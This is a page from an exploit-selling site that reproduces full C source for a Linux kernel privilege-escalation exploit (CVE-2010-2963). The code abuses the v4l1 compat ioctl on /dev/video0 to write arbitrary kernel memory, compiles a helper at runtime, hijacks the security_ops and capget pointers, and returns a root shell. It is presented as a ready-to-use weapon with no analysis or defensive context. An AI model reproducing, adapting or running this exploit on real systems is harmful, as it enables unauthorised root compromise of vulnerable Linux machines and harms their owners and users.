0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux Kernel VIDIOCSMICROCODE IOCTL Local Memory Overwrite
[==========================================================
Linux Kernel VIDIOCSMICROCODE IOCTL Local Memory Overwrite
==========================================================
/*
* CVE-2010-2963
* Arbitrary write memory write via v4l1 compat ioctl.
* Kees Cook <kees@ubuntu.com>
*
* greets to drosenberg, spender, taviso
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include "exp_framework.h"
#include <stdint.h>
#include <string.h>
#include <poll.h>
#include <sys/ioctl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/types.h>
#include <linux/videodev.h>
#include <syscall.h>
#include <sys/capability.h>
struct cap_header_t {
uint32_t version;
int pid;
};
#define DEVICE "/dev/video0"
struct exploit_state *exp_state;
char *desc = "Vyakarana: Linux v4l1 compat ioctl arbitrary memory write";
int requires_null_page = 0;
int built = 0;
int super_memcpy(unsigned long destination, void *source, int length)
{
struct video_code vc = { };
struct video_tuner tuner = { };
int dev;
unsigned int code;
char cmd[80];
if (!built) {
FILE *source;
char *sourcecode = "/*\n\
* CVE-2010-2963: Write kernel memory via v4l compat ioctl.\n\
* Oct 11, 2010 Kees Cook <kees@ubuntu.com>\n\
*\n\
*/\n\
#define _GNU_SOURCE\n\
#include <stdio.h>\n\
#include <stdlib.h>\n\
#include <stdint.h>\n\
#include <unistd.h>\n\
#include <sys/types.h>\n\
#include <sys/stat.h>\n\
#include <fcntl.h>\n\
#include <string.h>\n\
#include <sys/ioctl.h>\n\
#include <sys/mman.h>\n\
#include <assert.h>\n\
#include <malloc.h>\n\
#include <sys/types.h>\n\
#include <linux/videodev.h>\n\
#include <syscall.h>\n\
\n\
#define DEVICE \"/dev/video0\"\n\
\n\
struct video_code32 {\n\
char loadwhat[16];\n\
int datasize;\n\
int padding;\n\
uint64_t data;\n\
};\n\
\n\
int super_memcpy(uint64_t destination, void *source, int length)\n\
{\n\
struct video_code32 vc = { };\n\
struct video_tuner tuner = { };\n\
int dev;\n\
unsigned int code;\n\
\n\
if ( (dev=open(DEVICE, O_RDWR)) < 0) {\n\
perror(DEVICE);\n\
return 1;\n\
}\n\
\n\
vc.datasize = length;\n\
vc.data = (uint64_t)(uintptr_t)source;\n\
\n\
memset(&tuner, 0xBB, sizeof(tuner));\n\
\n\
// manual union, since a real union won't do ptrs for 64bit\n\
uint64_t *ptr = (uint64_t*)(&(tuner.name[20]));\n\
*ptr = destination;\n\
\n\
// beat memory into the stack...\n\
code = VIDIOCSTUNER;\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
syscall(54, dev, code, &tuner);\n\
\n\
code = 0x4020761b; // VIDIOCSMICROCODE32 (why isn't this VIDIOCSMICROCODE?)\n\
syscall(54, dev, code, &vc);\n\
\n\
return 0;\n\
}\n\
\n\
int main(int argc, char *argv[])\n\
{\n\
uint64_t destination = strtoull(argv[1], NULL, 16);\n\
uint64_t value = strtoull(argv[2], NULL, 16);\n\
int length = atoi(argv[3]);\n\
if (length > sizeof(value))\n\
length = sizeof(value);\n\
return super_memcpy(destination, &value, length);\n\
}\n\
";
if (!(source = fopen("vyakarana.c","w"))) {
fprintf(stderr, "cannot write source\n");
return 1;
}
fwrite(sourcecode, strlen(sourcecode), 1, source);
fclose(source);
if (system("gcc -Wall -m32 vyakarana.c -o vyakarana") != 0) {
fprintf(stderr, "cannot build source\n");
return 1;
}
built = 1;
}
printf("Writing to %p (len %d): ", (void*)destination, length);
for (dev=0; dev<length; dev++) {
printf("0x%02x ", *((unsigned char*)source+dev));
}
printf("\n");
sprintf(cmd, "./vyakarana %lx %lx 8", (uint64_t)(uintptr_t)destination, *(uint64_t*)source);
return system(cmd);
}
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
unsigned long default_sec;
unsigned long target;
unsigned long restore;
int prepare(unsigned char *buf)
{
unsigned long addr;
if (sizeof(long)!=8) {
printf("Not enough bits\n");
return 1;
}
printf("Reticulating splines...\n");
addr = exp_state->get_kernel_sym("security_ops");
default_sec = exp_state->get_kernel_sym("default_security_ops");
restore = exp_state->get_kernel_sym("cap_capget");
// reset security_ops
super_memcpy(addr, &default_sec, sizeof(void*));
// aim capget to enlightenment payload
target = default_sec + ((11 + sizeof(void*) -1) / sizeof(void*))*sizeof(void*) + (2 * sizeof(void*));
super_memcpy(target, &(exp_state->own_the_kernel), sizeof(void*));
return 0;
}
int trigger(void)
{
struct cap_header_t hdr;
uint32_t data[3];
printf("Skipping school...\n");
hdr.version = _LINUX_CAPABILITY_VERSION_1;
hdr.pid = 1;
capget((cap_user_header_t)&hdr, (cap_user_data_t)data);
return 1;
}
int post(void)
{
printf("Restoring grammar...\n");
// restore security op pointer
super_memcpy(target, &restore, sizeof(void*));
return RUN_ROOTSHELL;
}
# 0day.today [2024-11-15] #